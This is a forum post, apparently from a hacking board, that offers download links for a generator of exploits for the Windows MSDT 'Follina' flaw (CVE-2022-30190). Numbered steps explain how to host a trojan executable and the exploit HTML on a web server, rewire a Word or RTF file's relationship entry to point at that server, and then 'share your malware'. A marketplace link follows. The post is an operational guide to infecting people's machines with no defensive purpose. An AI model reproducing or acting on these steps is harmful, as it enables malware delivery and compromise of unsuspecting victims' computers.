Grupa: Użytkownik
Posty: 1912 #8002525 Od: 2020-10-23
Download 1: http://j.gs/19214853/hacxx-msdt-0-day-cve-2022-30190 http://bc.vc/HhVtG1N https://lnkload.com/2z6f3
Download 2: https://filecrypt.cc/Container/459647374D.html https://oxy.name/d/oxBf http://gigapeta.com/dl/10233698a8e4bbd https://nitro.download/view/633EC01C0E8F192 http://ddl.to/d/2a97w
How to [code] 01 - Create the exploit code with Hacxx MSDT 0-Day CVE-2022-30190 Exploit Generator
02 - If you don't have a command exploit code open Command Example.
03 - Save the code from the generator as test.html
04 - Upload your trojan.exe to your web host and upload test.html too
06 - Create and save a Word document or RTF (RTF allow code execution just by browsing the file in the folder without open it)
07 - Open the Word or RTF with winrar and extract /msdt/original_doc/_rels/document.xml.rels
08 - Open the .rels file with notepad and edit the line rId996 to your http://yoursite.com/test.html file
09 - Copy the .rels file to the word or rtf document
10 - Share your malware. [/code]
Virus Scan: https://www.joesandbox.com/analysis/668454/0/html _________________ OG Marketplace - https://files.offshore.cat/XNObT0Tz.html |